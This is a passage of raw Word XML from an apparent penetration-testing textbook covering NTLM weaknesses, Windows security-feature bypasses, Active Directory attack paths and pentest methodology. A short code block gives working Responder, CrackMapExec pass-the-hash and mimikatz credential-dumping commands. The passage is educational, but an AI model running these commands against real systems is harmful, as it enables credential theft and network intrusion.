        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM Authentication Flow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Client sends username to server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server sends a random challenge (nonce)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Client hashes the challenge with the user's NTLM hash and sends it back</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server verifies the response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This protocol has critical weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Hash (PTH): You don't need to know the plaintext password - just the NTLM hash is enough to authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM Relay: Intercept an authentication attempt and replay it to a different server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder: Tool that poisons LLMNR/NBT-NS to capture NTLM hashes from the network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Capture hashes with Responder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">responder -I eth0 -wrf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pass-the-Hash with CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crackmapexec smb 192.168.1.0/24 -u administrator -H [NTLM_HASH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Dump credentials with mimikatz (requires admin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lsadump::sam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Windows Security Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern Windows has many built-in security features. Understanding them helps both defenders configure them and attackers work around them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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4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Bypass Considerations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Windows Defender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Built-in antivirus &amp; EDR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 evasion, obfuscation, living off the land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BitLocker</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Full-disk encryption</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Cold boot attacks, TPM attacks (specialized hardware required)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UAC (User Account Control)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Prompts for elevated privileges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UAC bypass techniques (multiple known methods)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AppLocker/WDAC</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Application whitelisting</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LOLBins (Living Off the Land Binaries)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Windows Firewall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Network traffic filtering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Usually allows outbound - use for egress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Credential Guard</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Protects LSASS in virtualized container</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Newer technique; limits credential dumping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SmartScreen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Warns about unknown executables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Code signing, social engineering</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AMSI</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Scans scripts before execution</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AMSI bypass techniques in PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 Active Directory Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory (AD) is the identity and access management backbone of most enterprise networks. Compromising AD = compromising the entire organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain: A logical grouping of computers, users, and resources with a central directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Controller (DC): The server running Active Directory Domain Services. The most critical server in a Windows network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Users/Computers/Groups: Objects stored in AD. Groups control permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO (Group Policy Object): Settings pushed to all machines in the domain from the DC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos: The authentication protocol used in AD environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key AD attack paths:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP Roasting: Targets accounts without Kerberos pre-authentication required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoasting: Requests TGS tickets for service accounts and cracks them offline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DCSync: Mimics a domain controller replication request to dump all credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound: Tool that maps AD relationships to find attack paths to Domain Admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART FOUR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 7: The Penetration Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing is not random hacking. It follows a structured methodology that mirrors how real attackers operate - but with authorization, documentation, and professional accountability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 The Penetration Testing Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every professional penetration test follows these phases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Key Deliverable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Scoping &amp; Rules of Engagement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Define targets, limitations, legal authorization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Signed statement of work / authorization letter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 Reconnaissance</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Passive and active information gathering</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Target profile document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Scanning &amp; Enumeration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Port scanning, service identification, vulnerability assessment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Vulnerability list with CVEs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 Exploitation</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Attempting to compromise identified vulnerabilities</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Proof of access (screenshots, hash dumps)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Post-Exploitation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Privilege escalation, lateral movement, persistence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Compromise impact assessment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6. Reporting</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Documenting findings with business risk context</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Final penetration test report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LEGAL WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NEVER run any penetration testing activity against systems you do not have explicit written authorization to test. Unauthorized access is illegal under computer fraud laws (CFAA in the US) regardless of intent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance is gathering information about your target before you touch it. Split into two types:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive Reconnaissance (no direct contact with target):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
